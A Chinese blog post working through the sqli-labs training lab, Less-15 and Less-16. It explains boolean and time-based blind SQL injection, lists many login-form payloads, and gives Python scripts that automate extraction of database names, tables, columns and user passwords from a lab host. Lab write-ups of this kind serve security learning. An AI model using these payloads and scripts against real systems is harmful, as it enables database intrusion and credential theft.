Sqli-labs 复习 Less15-16 布尔-延时型sql盲注 - POST

最新推荐文章于 2023-07-24 10:48:28 发布
最新推荐文章于 2023-07-24 10:48:28 发布
阅读量513 收藏 5
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/81592487
版权

之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象

Sqli-labs 博客目录

布尔/延时型盲注

函数讲解

布尔型盲注

  1. 四种方法讲解:

    1. left()
    2. ascii()、substr()
    3. regexp
    4. ord()、mid()

  2. 其中:

    1. left(string,2)=’sa’: string 的前两位等于sa
    2. ascii(substr(string,2,1))=102: string的第二位开始的后一位的ascii码为 102
    3. table_name regexp ‘\^us[a-z]’:table_name 是以 us 为开头的
    4. ord(mid(string,2,1))=68: stringd的第二位开始的后一位的十六进制为 68

  3. 示例

    1. left()

      admin’ and left((要注入的语句),1)=’xxx’#

      admin’and left((select database() limit 0,1),1)=’s’#

    2. ascii(substr())=xxx //二进制

      admin’ and ascii(substr((要注入的语句),0,1))=102#

      admin’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1,1))=101#

    3. xxxx regexp ‘\^us[a-z]’

      admin’ and ((要注入的语句) regexp ‘\^se’ limit 0,1)#

      admin’ and (select database() regexp ‘\^se’ limit 0,1)#

    4. ord(mid())=xxx // 十六进制

      admin’ and ord(mid((select username from security.users limit 0,1),1,1))=68#

      admin’ and ord(mid((select password from security.users limit 0,1),1,1))=68#

      ifnull(expr1,expr2),含义是:如果第一个参数不为空,则返回第一个参数,否则返回第二个参数。 cast(字段名 as 转换的类型 )

      admin’ and ord(mid((select ifnull(cast(username as char),0x20)from security.users order by id limit 0,1),1,1))=68#

      admin’ and ord(mid((select ifnull(cast(password as char),0x20)from security.users order by id limit 0,1),1,1))=68#

延时型盲注

  1. 利用 sleep() 函数进行注入

    ?id=1’ and if(ascii(substr(database(),1,1))=115,sleep(5),1)#

    ?id=1’ union select (if(substring(database(),1,1)=char(115),sleep(5),1)),2,3#

    ?id=1’ and if(ascii(substr((要执行的语句),1,1))=115,sleep(5),1)#

    ?id=1’ union select (if(substring((要执行的语句),1,1)=char(115),sleep(5),1)),2,3#

    当错误的时候会有5 秒的时间延时。

  2. 利用 benchmark()进行延时注入

    ?id=1’ and (select 1 from (select concat((ascii(substr((要执行的语句),1,1))=115),benchmark(50000000,encode(‘msg’,’key’)))x from information_schema.tables group by x)a)#

    ?id=1’ and if(ascii(substr((要执行的语句),1,1))=115,benchmark(50000000,encode(‘msg’,’key’)),1)#

    ?id=1’ union select (if(substring((要执行的语句),1,1)=char(115),benchmark(50000000,encode(‘msg’,’key’)),1)),2,3#

    ?id=1’ and (select 1 from (select concat((ascii(substr((database()),1,1))=115),benchmark(50000000,encode(‘msg’,’key’)))x from information_schema.tables group by x)a)#

    ?id=1’ and (select 1 from (select concat((select username from security.users limit 0,1),benchmark(50000000,encode(‘msg’,’key’)))x from information_schema.tables group by x)a)#

    ?id=1’ and if(ascii(substr(benchmark(50000000,encode(‘msg’,’key’)),1,1))=115,sleep(5),1)#

    ?id=1’ union select (if(substring((select database() limit 0,1),1,1)=char(115),benchmark(50000000,encode(‘msg’,’key’)),1)),2,3#

    当结果正确的时候,运行encode(‘msg’,’key’)操作50000000 次,会占用一段时间。

    benchmark()函数,可以测试某些特定操作的执行速度。该函数只是简单地返回服务器执行表达式的时间,而不会涉及分析和优化的开销。

    MySQL 字符串截取函数:left(), right(), substring(), substring_index(), mid(), substr()。其中 mid(), substr() 等价于 substring() 函数

    encode() 对字符进行加密运算 mysql加密解密方式用法 encode()、decode()

Less-15 布尔/延时型盲注-单引号

  1. 测试

    在 username 输入 1'or 1=1#
在 password 输入 任意

admin' order by 2   //登录成功
admin' order by 3   //登录失败

    使用布尔型注入,但是没有报错信息,没有可供脚本抓取的关键字,只好手工注入了。

  2. 猜数据库名

    admin’ and left((要注入的语句),1)=’xxx’#

    admin’and left((select database() limit 0,1),1)=’s’#

    admin’and left((select database() limit 0,1),2)=’se’#

    admin’and left((select database() limit 0,1),3)=’sec’#

    admin’and left((select database() limit 0,1),8)=’security’#

    结果为 security

  3. 猜表名

    admin’ and ascii(substr((要注入的语句),0,1))=102#

    admin’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1,1))=101#

    admin’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),2,1))=109#

    admin’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),3,1))=97#

    admin’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 1,1),1,1))=114#

    admin’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 1,1),2,1))=101#

    admin’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 1,1),2,1))=102#

    结果为: emails referers uagents users

  4. 猜列名

    admin’ and ((要注入的语句) regexp ‘\^se’ limit 0,1)#

    admin’ and (select database() regexp ‘\^se’ limit 0,1)#

    admin’ and (select 1 from information_schema.columns where table_name=’users’ and column_name regexp ‘\^u’ limit 0,1)#

    admin’ and (select 1 from information_schema.columns where table_name=’users’ and column_name regexp ‘\^us’ limit 0,1)#

    admin’ and (select 1 from information_schema.columns where table_name=’users’ and column_name regexp ‘\^use’ limit 0,1)#

    admin’ and (select 1 from information_schema.columns where table_name=’users’ and column_name regexp ‘\^username’ limit 0,1)#

    结果为 id last password username

  5. 猜数据

    ifnull(expr1,expr2),含义是:如果第一个参数不为空,则返回第一个参数,否则返回第二个参数。 cast(字段名 as 转换的类型 )

    admin’ and ord(mid((select ifnull(cast(username as char),0x20)from security.users order by id limit 0,1),1,1))=68#

    admin’ and ord(mid((select ifnull(cast(password as char),0x20)from security.users order by id limit 0,1),1,1))=68#

    admin’ and ord(mid((select username from security.users limit 0,1),1,1))=68#

    admin’ and ord(mid((select password from security.users limit 0,1),1,1))=68#

    结果为 

    username: Dumb  Angelina    Dummy   secure  stupid  superman    batman  admin   admin   admin   
password: Dumb  Ikillyo pssword crappy  stupidity   genious     moble   admin   admin   admin

函数讲解 Less-16 布尔/延时型盲注-双引号

  1. 测试

    在 username 输入 admin') or 1=1#
在 password 输入 任意

admin") order by 2# //登录成功
admin") order by 3# //登录失败

使用延时注入,可以使用脚本

  2. 猜数据库名

    admin”) and if(ascii(substr((select database() limit 0,1),1,1))=115,sleep(5),1)#

    admin”) and if(ascii(substr((select database() limit 0,1),2,1))=101,sleep(5),1)#

    admin”) and if(ascii(substr((select database() limit 0,1),3,1))=99, sleep(5),1)#

    结果为 security

    运行脚本

    # -*- coding: utf-8 -*-
# filename:Less16-1 database_name.py

import hackhttp
import re
import time

def database_name(arg):
    print "database_name start test..."
    database_name=""
    database_name=""
    for k in range(5):
        for i in range(1,10):
            for j in range(65,122):
                startTime=time.time()
                hh = hackhttp.hackhttp()
                post = 'uname=admin")and if(ascii(substr((select database() limit {k},1),{i},1))={j},sleep(5),1) #&passwd=aaa&submit=Submit'.format(k=k,i=i,j=j)
                code, head, body, redirect_url, log = hh.http(arg,post) 
                if time.time() - startTime > 5:
                    database_name+=chr(j)
                    print "第%s个数据库的第%s位的ASCII码值是%s" % (k+1,i,j)
                    break
        database_name+=" "
    print "security 数据库名为: {database_name}".format(database_name=database_name)

if __name__ == '__main__':
    database_name('http://10.10.10.130/sqli-labs/Less-16/')

  3. 猜表名

    admin”) and if(ascii(substr((要执行的语句),1,1))=xxx,sleep(5),1)

    admin”) and if(ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1),1,1))=114,sleep(5),1)#

    admin”) and if(ascii(substr((select table_name from information_schema.tables where table_schema=”security” limit 1,1),2,1))=101,sleep(5),1)#

    admin”) and if(ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 1,1),3,1))=102,sleep(5),1)#

    结果为 emails referers uagents users

    执行脚本

    # -*- coding: utf-8 -*-
# filename:Less16-2 table_name.py

import hackhttp
import re
import time

def table_name(arg):
    print "table_name start test..."
    payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
    table_name=""
    for k in range(5):
        for i in range(1,10):
            for j in range(65,122):
                startTime=time.time()
                hh = hackhttp.hackhttp()
                post = 'uname=admin") and if(ascii(substr((select table_name from information_schema.tables where table_schema="security" limit {k},1),{i},1))={j},sleep(5),1)#&passwd=aaa&submit=Submit'.format(k=k,i=i,j=j)
                code, head, body, redirect_url, log = hh.http(arg,post) 
                count = re.findall("You are in",body)
                if time.time() - startTime > 5:
                    table_name+=chr(j)
                    print "第%s个表的第%s位的ASCII码值是%s" % (k+1,i,j)
                    break
        table_name+=" "
    print "security 数据库的表名为: {table_name}".format(table_name=table_name)

if __name__ == '__main__':
    table_name('http://10.10.10.130/sqli-labs/Less-16/')

  4. 猜列名

    admin”) and if(ascii(substr((要执行的语句),1,1))=115,benchmark(50000000,encode(‘msg’,’key’)),1)#

    admin”) union select (if(substring((要执行的语句),1,1)=char(115),benchmark(50000000,encode(‘msg’,’key’)),1)),2#

    admin”) union select (if(substring((select column_name from information_schema.columns where table_name=”users” limit 0,1),1,1)=char(117),benchmark(50000000,encode(“msg”,”key”)),null)),2#

    admin”) union select (if(substring((select column_name from information_schema.columns where table_name=’users’ limit 0,1),2,1)=char(115),benchmark(50000000,encode(‘msg’,’key’)),null)),2#

    admin”) union select (if(substring((select column_name from information_schema.columns where table_name=’users’ limit 0,1),3,1)=char(101),benchmark(50000000,encode(‘msg’,’key’)),null)),2#

    结果为:user_id first_nam last_name user password

    运行脚本 

    # 跑脚本太耗服务器资源了,每次都跑不完就无响应断开连接了(服务器 down 了)。
# -*- coding: utf-8 -*-
# filename:Less16-3 column_name.py

import hackhttp
import re
import time

def column_name(arg):
    print "column_name start test..."
    payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
    column_name=""
    for k in range(5):
        for i in range(1,10):
            for j in range(65,122):
                startTime=time.time()
                hh = hackhttp.hackhttp()
                post = 'uname=admin") union select (if(substring((select column_name from information_schema.columns where table_name="users" limit {k},1),{i},1)=char({j}),benchmark(50000000,encode("msg","key")),null)),2#&passwd=aaa&submit=Submit'.format(k=k,i=i,j=j)
                code, head, body, redirect_url, log = hh.http(arg,post) 
                #count = re.findall("You are in",body)
                if time.time() - startTime > 5:
                    column_name+=chr(j)
                    print "第%s个列的第%s位的ASCII码值是%s" % (k+1,i,j)
                    break
        column_name+=" "
    print "security 数据库的 user 表的列名为: {column_name}".format(column_name=column_name)

if __name__ == '__main__':
    column_name('http://10.10.10.130/sqli-labs/Less-16/')

  5. 猜数据

    admin”) and if(ascii(substr((要执行的语句),1,1))=115,benchmark(50000000,encode(‘msg’,’key’)),1)#

    admin”) and if(ascii(substr((select username from security.users limit 0,1),1,1))=68,benchmark(50000000,encode(‘msk’,’key’)),1)#

    admin”) and if(ascii(substr((select username from security.users limit 0,1),2,1))=117,benchmark(50000000,encode(‘msg’,’key’)),1)#

    admin”) and if(ascii(substr((select username from security.users limit 0,1),3,1))=109,benchmark(50000000,encode(‘msg’,’key’)),1)#

    结果为:

    username: Dumb  Angelina    Dummy   secure  stupid  superman    batman  admin   admin   admin   
password: Dumb  Ikillyo     pssword crappy  stupidity   genious moble   admin   admin   admin

执行脚本

    # 跑脚本太耗服务器资源了,每次都跑不完就无响应断开连接了(服务器 down 了)。
    # -*- coding: utf-8 -*-
    # filename:Less16-4 data.py

    import hackhttp
    import re
    import time

    def data(arg):
        print "data start test..."
        payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.-+*/')
        payload2 = ['username','password']
        data="username: "
        for k in payload2:  # 两个列名
            for x in range(10): # 每个列假设十个数据
                for i in range(1,10):   # 每个数据的第i位的值匹配j
                    for j in range(65,122): # 
                        startTime=time.time()
                        hh = hackhttp.hackhttp()
                        post = 'uname=admin") and if(ascii(substr((select {k} from security.users limit {x},1),{i},1))={j},benchmark(50000000,encode("msg","key")),1)#&passwd=aaa&submit=Submit'.format(k=k,x=x,i=i,j=j)
                        code, head, body, redirect_url, log = hh.http(arg,post)            
                        count = re.findall("You are in",body)
                        if time.time() - startTime > 5:
                            data+=chr(j)
                            print "%s列的第%s个数据的第%s位的ASCII码值是%s" % (k,x+1,i,j)
                            break
                data += "\t"
            print "{data}".format(data=data)
            data += "\npassword: "

    if __name__ == '__main__':
        data('http://10.10.10.130/sqli-labs/Less-16/')
网络安全打工人
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs靶场Less-15
songling515010475的专栏
08-26 229
1、访问首页,/Less-15/index.php,这里的传参点是表单中的uname、passwd 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 如果以上都不适:哪以上规则都同时加上sleep测试一遍,看是不是存在延时注入 分析:这里同时存在布尔延时注入,哪这里可以使用盲注延时盲注来做这个题。 2、使用盲注获取数据库长度 -- 盲注 admin' and length(databa...
sqli-labs/Less-15
m0_71299382的博客
11-18 500
sqli-labs第十五关
[网络安全]sqli-labs Less-15 解题详析
等风来
07-24 2463
以上为[网络安全]sqli-labs Less-15 解题详析,后续将分享[网络安全]sqli-labs Less-16 解题详析我是秋说,我们下次见。
Sqli-labs之Less-15和Less-16
→_→
04-08 2172
Less-15 基于布尔/时间延迟单引号POST盲注 测试: ?id=1uname=1&passwd=1uname=1&passwd=1 ?id=1'...
Sqlilabs Less-15
Light_inthe_eyes的博客
03-07 132
判断是单引号字符注入: uname=admin'#&passwd=&submit=Submit 判断列数: uname=admin'+order+by+2#&passwd=&submit=Submit
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs配置数据库sqli-labs的数据库文件
03-09
Unable to connect to the database: security sqli-labs通过docker安装时,缺少数据库文件,可以通过这个sql文件直接安装
sqli-labs靶场实现(五)【POST基于时间与布尔盲注】(less-15(单引号)、less-16(双引号),具体步骤+图文详解)
weixin_46709219的博客
12-20 468
一)POST基于时间与布尔盲注   1)HTTP POST介绍   2)POST基于时间的盲注   3)POST基于布尔盲注   4)sqlmap安全测试 —————————————————————————————————————————————————————— 一)POST基于时间与布尔盲注 1)HTTP POST介绍 前面已经有讲解过GET的基于时间与布尔盲注,也已经讲解过POST的错误注入(怎么用burpsuite进行抓包注入),本节就是将前面的两者结合起来变成POST基于时间与布
sqli-labs (less-15)
kukudeshuo的博客
03-09 383
sqli-labs (less-15) 进入15关,输入用户名和密码,登入后发现没有数据返回 输入 uname=admin'&passwd=admin&submit=Submit #没有错误显示 uname=admin"&passwd=admin&submit=Submit #没有错误显示 这里我们发现我们不管我们输入什么都是没有错误信息显示的,这里我们可以使用时间盲注的方法判断注入点 uname=admin' and sleep(5)#&passwd=admi
生命在于折腾——SQL注入的实操(三)less11-15
易水哲的博客
08-20 568
本篇文章是sql-lib的11-15关。
软件安全实验——pre8(SQL注入预习)
Onlyone_1314的博客
08-09 418
这里写目录标题一级目录1、网上搜索和阅读SQL Injection with MySQL这篇文章。2、SQL Injection过程中,1、快速确定未知数据结构的字段及类:2、猜数据表名:3、(一定要看)阅读Basic SQL Tutorial。4、(选做,实在搞不定可以网上搜索walkthrough)HTS Realistic 4。 一级目录 1、网上搜索和阅读SQL Injection with MySQL这篇文章。 描述SQL Injection的原因和危害,注意其中提到的单引号双引号和井号等特殊
Sqli-labs Less15-16 布尔-延时sql盲注 - POST
kevinhanser
08-09 648
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 15: POST - Blind - Booliant/time Based - Single Quotes 测试漏洞 本馆没有错误提示,利用延时注入 源代码中 @$sql="SELECT username, password FROM users WHERE username='$u...
sqli - labs - Less15 ~ 16
m0_62102000的博客
07-18 245
sqli - labs - Less15 ~ 16
SQLI-LAB  的 实战记录(Less 11 - Less 20)
这块盾牌有待改良
07-15 4308
Less - 11 Error Based- String Less - 12 Error Based- Double quotes- String Less - 13 Double Injection- String- with twist
Mysql注入学习笔记
xj28555的博客
06-25 2143
MYSQL注入 函数 version()——MySQL 版本 user()——数据库用户名 database()——数据库名 @@datadir——数据库路径 @@version_compile_os——操作系统版本 information_schema 自带数据库 information_schema.schemata 数据库 information_schema.tables 数据表 information_schema.columns 数据列 floor函数返回小于等于该值的最大整数 RAND()
sqli labs less 15
Xiaoxiaoqiang_的博客
03-02 202
sql注入
sqli-labs靶场练习笔记
最新发布
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 1516关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值